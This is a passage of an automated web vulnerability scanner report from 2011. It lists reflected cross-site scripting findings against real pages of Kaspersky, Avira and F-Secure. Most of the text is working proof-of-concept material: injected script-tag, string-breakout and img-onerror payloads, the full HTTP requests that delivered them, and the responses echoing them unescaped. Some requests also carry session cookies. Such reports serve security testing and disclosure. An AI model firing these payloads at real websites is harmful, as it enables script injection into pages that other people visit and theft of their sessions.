Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com/files/js_injector_52.js64217"-alert(1)-"8ecc3cd7366?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:34:12 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387652"
Content-Type: text/html; charset=utf-8
Content-Length: 40454
Date: Sun, 23 Oct 2011 16:34:22 GMT
X-Varnish: 1652559462
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
ame = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js64217"-alert(1)-"8ecc3cd7366?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.94. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/js_injector_52.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e47c7"><script>alert(1)</script>5c188c1380c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/js_injector_52.jse47c7"><script>alert(1)</script>5c188c1380c?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:33:39 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387619"
Content-Type: text/html; charset=utf-8
Content-Length: 37857
Date: Sun, 23 Oct 2011 16:33:52 GMT
X-Varnish: 1652557801
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.jse47c7"><script>alert(1)</script>5c188c1380c?3" />
...[SNIP]...

1.95. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/js_injector_55.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae927"><script>alert(1)</script>779246731c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesae927"><script>alert(1)</script>779246731c/usa.kaspersky.com/files/js_injector_55.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:27:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387251"
Content-Type: text/html; charset=utf-8
Content-Length: 30994
Date: Sun, 23 Oct 2011 16:27:45 GMT
X-Varnish: 1652539868
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sitesae927"><script>alert(1)</script>779246731c/usa.kaspersky.com/files/js_injector_55.js?3" />
...[SNIP]...

1.96. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/js_injector_55.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d764b"-alert(1)-"55c3a8e0f63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitesd764b"-alert(1)-"55c3a8e0f63/usa.kaspersky.com/files/js_injector_55.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:28:16 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387296"
Content-Type: text/html; charset=utf-8
Content-Length: 30903
Date: Sun, 23 Oct 2011 16:28:17 GMT
X-Varnish: 1652542541
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sitesd764b"-alert(1)-"55c3a8e0f63/usa.kaspersky.com/files/js_injector_55.js?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.97. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/js_injector_55.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5549"-alert(1)-"dfc0fbdc3e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.comd5549"-alert(1)-"dfc0fbdc3e7/files/js_injector_55.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:29:20 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387360"
Content-Type: text/html; charset=utf-8
Content-Length: 30903
Date: Sun, 23 Oct 2011 16:29:32 GMT
X-Varnish: 1652546305
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.comd5549"-alert(1)-"dfc0fbdc3e7/files/js_injector_55.js?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.98. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/js_injector_55.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc447"><script>alert(1)</script>9d610eba500 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.comfc447"><script>alert(1)</script>9d610eba500/files/js_injector_55.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:29:01 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387341"
Content-Type: text/html; charset=utf-8
Content-Length: 31000
Date: Sun, 23 Oct 2011 16:29:06 GMT
X-Varnish: 1652544927
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.comfc447"><script>alert(1)</script>9d610eba500/files/js_injector_55.js?3" />
...[SNIP]...

1.99. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/js_injector_55.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5008a"-alert(1)-"d11620010df was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com/files5008a"-alert(1)-"d11620010df/js_injector_55.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:32:38 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387558"
Content-Type: text/html; charset=utf-8
Content-Length: 30903
Date: Sun, 23 Oct 2011 16:32:47 GMT
X-Varnish: 1652554518
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files5008a"-alert(1)-"d11620010df/js_injector_55.js?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.100. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/js_injector_55.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fca2"><script>alert(1)</script>17b8a824108 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files4fca2"><script>alert(1)</script>17b8a824108/js_injector_55.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:30:17 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387417"
Content-Type: text/html; charset=utf-8
Content-Length: 31000
Date: Sun, 23 Oct 2011 16:30:24 GMT
X-Varnish: 1652548871
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files4fca2"><script>alert(1)</script>17b8a824108/js_injector_55.js?3" />
...[SNIP]...

1.101. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/js_injector_55.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a734a"-alert(1)-"c56d4663c51 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com/files/js_injector_55.jsa734a"-alert(1)-"c56d4663c51?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:34:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387696"
Content-Type: text/html; charset=utf-8
Content-Length: 30903
Date: Sun, 23 Oct 2011 16:35:15 GMT
X-Varnish: 1652562352
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
ame = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.jsa734a"-alert(1)-"c56d4663c51?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.102. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/js_injector_55.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2632f"><script>alert(1)</script>66b2a5d2de9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/js_injector_55.js2632f"><script>alert(1)</script>66b2a5d2de9?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:34:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387671"
Content-Type: text/html; charset=utf-8
Content-Length: 31000
Date: Sun, 23 Oct 2011 16:34:36 GMT
X-Varnish: 1652560789
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js2632f"><script>alert(1)</script>66b2a5d2de9?3" />
...[SNIP]...

1.103. http://www.avira.com/search/frontendSc/autocomplete [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.avira.com
Path:   /search/frontendSc/autocomplete

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 562de<script>alert(1)</script>23d8f12d546 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search562de<script>alert(1)</script>23d8f12d546/frontendSc/autocomplete?q=xss+sqli+httpi+xml+&limit=10&timestamp=1319387725943 HTTP/1.1
Host: www.avira.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.avira.com/en/avira-version2012-b2c?x-campaigns=Version2012&x-Version2012=s_web&x-s_web=consumer-overview_link_en&utm_source=direct_organic&utm_medium=banner_en&utm_content=consumer_overview_link_en&utm_campaign=Version2012&x-origin=web
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lo3ik4pdav5vuvd85tno2aufq2; language=en; country=US; passthrough=%7B%22x-campaigns%22%3A%22Version2012%22%2C%22x-Version2012%22%3A%22s_web%22%2C%22x-s_web%22%3A%22consumer-overview_link_en%22%2C%22x-origin%22%3A%22web%22%7D; __utma=1.490122956.1319387150.1319387150.1319387543.2; __utmb=1.1.10.1319387543; __utmc=1; __utmz=1.1319387543.2.2.utmcsr=direct_organic|utmccn=Version2012|utmcmd=banner_en|utmcct=consumer_overview_link_en

Response

HTTP/1.1 404 CHttpException
Server: nginx/1.0.6
Date: Sun, 23 Oct 2011 16:36:16 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 135

<h1>CHttpException</h1>
<p>Unable to resolve the request "search562de<script>alert(1)</script>23d8f12d546/frontendSc/autocomplete".</p>

1.104. http://www.avira.com/search/frontendSc/autocomplete [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.avira.com
Path:   /search/frontendSc/autocomplete

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1e901<script>alert(1)</script>37bf346d290 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/frontendSc1e901<script>alert(1)</script>37bf346d290/autocomplete?q=xss+sqli+httpi+xml+&limit=10&timestamp=1319387725943 HTTP/1.1
Host: www.avira.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.avira.com/en/avira-version2012-b2c?x-campaigns=Version2012&x-Version2012=s_web&x-s_web=consumer-overview_link_en&utm_source=direct_organic&utm_medium=banner_en&utm_content=consumer_overview_link_en&utm_campaign=Version2012&x-origin=web
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lo3ik4pdav5vuvd85tno2aufq2; language=en; country=US; passthrough=%7B%22x-campaigns%22%3A%22Version2012%22%2C%22x-Version2012%22%3A%22s_web%22%2C%22x-s_web%22%3A%22consumer-overview_link_en%22%2C%22x-origin%22%3A%22web%22%7D; __utma=1.490122956.1319387150.1319387150.1319387543.2; __utmb=1.1.10.1319387543; __utmc=1; __utmz=1.1319387543.2.2.utmcsr=direct_organic|utmccn=Version2012|utmcmd=banner_en|utmcct=consumer_overview_link_en

Response

HTTP/1.1 404 CHttpException
Server: nginx/1.0.6
Date: Sun, 23 Oct 2011 16:36:18 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 135

<h1>CHttpException</h1>
<p>Unable to resolve the request "search/frontendSc1e901<script>alert(1)</script>37bf346d290/autocomplete".</p>

1.105. http://www.avira.com/search/frontendSc/autocomplete [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.avira.com
Path:   /search/frontendSc/autocomplete

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3ff84<img%20src%3da%20onerror%3dalert(1)>6b7f0b34b86 was submitted in the REST URL parameter 3. This input was echoed as 3ff84<img src=a onerror=alert(1)>6b7f0b34b86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/frontendSc/autocomplete3ff84<img%20src%3da%20onerror%3dalert(1)>6b7f0b34b86?q=xss+sqli+httpi+xml+&limit=10&timestamp=1319387725943 HTTP/1.1
Host: www.avira.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.avira.com/en/avira-version2012-b2c?x-campaigns=Version2012&x-Version2012=s_web&x-s_web=consumer-overview_link_en&utm_source=direct_organic&utm_medium=banner_en&utm_content=consumer_overview_link_en&utm_campaign=Version2012&x-origin=web
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lo3ik4pdav5vuvd85tno2aufq2; language=en; country=US; passthrough=%7B%22x-campaigns%22%3A%22Version2012%22%2C%22x-Version2012%22%3A%22s_web%22%2C%22x-s_web%22%3A%22consumer-overview_link_en%22%2C%22x-origin%22%3A%22web%22%7D; __utma=1.490122956.1319387150.1319387150.1319387543.2; __utmb=1.1.10.1319387543; __utmc=1; __utmz=1.1319387543.2.2.utmcsr=direct_organic|utmccn=Version2012|utmcmd=banner_en|utmcct=consumer_overview_link_en

Response

HTTP/1.1 404 CHttpException
Server: nginx/1.0.6
Date: Sun, 23 Oct 2011 16:36:29 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 140

<h1>CHttpException</h1>
<p>The system is unable to find the requested action "autocomplete3ff84<img src=a onerror=alert(1)>6b7f0b34b86".</p>

1.106. http://www.f-secure.com/en/web/home_global/news-info/product-news-offers/view/story/463302/F-Secure%20Internet%20Security%202012%20-%20Complete%20Protection%20for%20Your%20Computer%20and%20Online%20Life [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.f-secure.com
Path:   /en/web/home_global/news-info/product-news-offers/view/story/463302/F-Secure%20Internet%20Security%202012%20-%20Complete%20Protection%20for%20Your%20Computer%20and%20Online%20Life

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 91193-->0fa78608273 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/web/home_global/news-info/product-news-offers/view/story/463302/F-Secure%20Internet%20Security%202012%20-%20Complete%20Protection%20for%20Your%20Computer%20and%20Online%20Life?91193-->0fa78608273=1 HTTP/1.1
Host: www.f-secure.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.f-secure.com/en/web/home_global/news-info/product-news-offers/view/story/463302/F-Secure%20Internet%20Security%202012%20-%20Complete%20Protection%20for%20Your%20Computer%20and%20Online%20Life
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
